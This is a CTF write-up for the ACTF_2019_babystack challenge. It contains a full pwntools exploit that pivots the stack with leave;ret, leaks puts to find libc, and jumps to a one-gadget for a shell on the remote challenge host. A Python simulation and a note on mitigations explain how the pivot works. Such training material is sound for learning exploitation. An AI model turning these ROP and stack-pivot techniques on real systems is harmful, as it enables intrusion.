<p>A simple challenge that uses a leave-based stack pivot (stack migration) to run a ROP chain longer than the overflow itself has room for.</p>
<pre class="wp-block-code"><code>#!/usr/bin/env python3
# coding=utf-8
from pwn import *
from LibcSearcher import *

pop_rdi_ret = 0x400ad3          # gadget: pop rdi ; ret
context(log_level='debug')

sh = remote("node3.buuoj.cn", "28568")
# sh = process("./ACTF_2019_babystack")
elf = ELF("./ACTF_2019_babystack")
libc = ELF("./buu-libc-2.23.so")

# Stage 1: ask for a 0xE0-byte read, take the buffer address the program prints,
# and place the ROP chain at the start of the buffer.
sh.sendlineafter(b"e?\n>", str(0xE0).encode())
sh.recvuntil(b"at ")
stackaddr = int(sh.recvuntil(b"\n", drop=True), base=16)

# The first 8 bytes become rbp after the pivot, so they are only filler;
# the chain proper starts at buffer+8: puts(puts@got), then return to 0x400800.
payload = b'fillfill' + p64(pop_rdi_ret) + p64(elf.got["puts"])
payload += p64(elf.symbols["puts"]) + p64(0x400800)
payload = payload.ljust(0xD0, b'a')
# Saved rbp -> buffer address, return address -> leave;ret gadget: the second
# leave moves rsp into the buffer and its ret starts the chain.
payload += p64(stackaddr) + p64(0x400A18)
sh.sendafter(b'>', payload)

sh.recvuntil(b"e~\n")
puts_addr = u64(sh.recvuntil(b'\n', drop=True).ljust(8, b'\x00'))
LIBC = LibcSearcher('puts', puts_addr)
base = puts_addr - LIBC.dump('puts')
print(hex(base))

# Stage 2: same overflow again, return address overwritten with the libc gadget at base+0x10a38c.
sh.sendlineafter(b"e?\n>", str(0xE0).encode())
sh.recvuntil(b"at ")
stackaddr = int(sh.recvuntil(b"\n", drop=True), base=16)
payload = b'a'.ljust(0xD8, b'a')
payload += p64(base + 0x10a38c)
sh.sendafter(b'>', payload)
sh.interactive()
</code></pre>
<p>Similar to <a href="https://www.cjovi.icu/?p=789">this challenge</a>.</p>
Last modified: 30 December 2020
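<p>To see why the chain above starts with eight bytes of filler and why the program's printed buffer address is what makes the pivot work, here is an added simulation of the two <code>leave ; ret</code> steps over the writeup's payload layout. It is not part of the original writeup; the gadget addresses and the 0xD0 offset are taken from the script above, while <code>PUTS_GOT</code>, <code>PUTS_PLT</code> and the stack address are constructed placeholders (the script resolves the first two from the ELF). It also makes the preconditions plain for anyone assessing a binary: the pivot needs the buffer address to be disclosed and the saved rbp to be overwritable, so a stack canary or not echoing stack addresses removes it.</p>

```python
import struct

# Values taken from the writeup's script (binary-specific, not re-verified here).
POP_RDI_RET = 0x400ad3   # gadget: pop rdi ; ret
LEAVE_RET   = 0x400A18   # gadget: leave ; ret (the pivot)
AFTER_PUTS  = 0x400800   # address the chain returns to after puts
BUF_TO_RBP  = 0xD0       # bytes from buffer start to the saved-rbp slot
# Constructed placeholders; the real script uses elf.got["puts"] / elf.symbols["puts"].
PUTS_GOT    = 0x601018
PUTS_PLT    = 0x400600

def p64(x): return struct.pack("<Q", x)
def u64(b): return struct.unpack("<Q", b)[0]

def build_payload(stackaddr):
    """Same layout as the writeup's first payload: filler, chain, pad, saved rbp, ret."""
    chain = b"fillfill" + p64(POP_RDI_RET) + p64(PUTS_GOT) + p64(PUTS_PLT) + p64(AFTER_PUTS)
    payload = chain.ljust(BUF_TO_RBP, b"a")
    payload += p64(stackaddr) + p64(LEAVE_RET)
    return payload

class Stack:
    """Tiny model of the stack region that begins at the buffer address."""
    def __init__(self, base, data):
        self.base, self.mem = base, bytearray(data)
    def read(self, addr):
        off = addr - self.base
        return u64(self.mem[off:off + 8])

def leave_ret(stack, rbp):
    """Model of `leave ; ret`: mov rsp, rbp ; pop rbp ; pop rip."""
    rsp = rbp
    rbp = stack.read(rsp); rsp += 8
    rip = stack.read(rsp); rsp += 8
    return rip, rsp, rbp

def trace_pivot(stackaddr=0x7ffc00000000):
    """Walk the function epilogue, the pivot gadget and the first chain gadget."""
    stack = Stack(stackaddr, build_payload(stackaddr) + b"\x00" * 0x40)
    steps = []
    # 1. The vulnerable function's own epilogue; rbp still points at the saved-rbp slot.
    rip, rsp, rbp = leave_ret(stack, stackaddr + BUF_TO_RBP)
    steps.append({"step": "function epilogue", "rip": rip, "rsp": rsp, "rbp": rbp})
    # 2. rip is now the leave;ret gadget and rbp is the buffer address, so rsp
    #    moves into the buffer; the filler is consumed as the new rbp.
    rip, rsp, rbp = leave_ret(stack, rbp)
    steps.append({"step": "leave;ret gadget", "rip": rip, "rsp": rsp, "rbp": rbp})
    # 3. First gadget of the chain proper: pop rdi ; ret.
    rdi = stack.read(rsp); rsp += 8
    rip = stack.read(rsp); rsp += 8
    steps.append({"step": "pop rdi;ret", "rip": rip, "rsp": rsp, "rbp": rbp, "rdi": rdi})
    return steps

if __name__ == "__main__":
    for s in trace_pivot():
        print({k: (hex(v) if isinstance(v, int) else v) for k, v in s.items()})
```

<p>After the first <code>leave</code> the saved-rbp slot hands rbp the buffer address; the gadget's <code>leave</code> then turns that into rsp, its <code>pop rbp</code> eats the <code>fillfill</code> bytes, and <code>ret</code> lands on <code>pop rdi ; ret</code> at buffer+8 with rsp pointing at the rest of the chain. The payload is exactly 0xE0 bytes, which is why the script asks for a 0xE0-byte read.</p>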